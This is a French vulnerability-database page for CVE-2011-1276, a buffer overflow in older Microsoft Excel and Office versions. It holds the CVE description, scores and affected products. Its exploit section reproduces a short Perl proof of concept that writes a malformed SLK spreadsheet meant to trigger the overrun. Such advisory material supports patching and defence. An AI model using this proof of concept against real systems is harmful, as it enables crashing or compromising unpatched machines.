CVE-2011-1276 : Détail

CVE-2011-1276

Overflow
96.72%V3
Network
2011-06-16
18h21 +00:00
2018-10-12
17h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Buffer overflow in Microsoft Excel 2002 SP3, 2003 SP3, and 2007 SP2; Office 2004 and 2008 for Mac; Open XML File Format Converter for Mac; Excel Viewer SP2; and Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP2 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Excel spreadsheet, related to improper validation of record information, aka "Excel Buffer Overrun Vulnerability."

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 17643

Date de publication : 2011-08-08 22h00 +00:00
Auteur : webDEViL
EDB Vérifié : Yes

# Exploit Title: Excel SLYK Format Parsing Buffer Overrun Vulnerability PoC # Date: [date] # Author: webDEViL # Software Link: [download link if available] # Version: [app version] # Tested on: ALL # CVE : CVE-2011-1276 # w3bd3vil[at]gmail[dot]com # twitter.com/w3bd3vil open (FILE, '>>CVE-2011-1276.slk'); print FILE "ID;P\n"; print FILE "P;PAAAA\n"x550; print FILE "P"; close (FILE);

Products Mentioned

Configuraton 0

Microsoft>>Excel >> Version 2002

Microsoft>>Excel >> Version 2003

Microsoft>>Excel >> Version 2007

Microsoft>>Excel_viewer >> Version *

Microsoft>>Office >> Version 2004

Microsoft>>Office >> Version 2008

Microsoft>>Office_compatibility_pack >> Version 2007

Microsoft>>Open_xml_file_format_converter >> Version *

Références

http://osvdb.org/72924
Tags : vdb-entry, x_refsource_OSVDB
http://securityreason.com/securityalert/8330
Tags : third-party-advisory, x_refsource_SREASON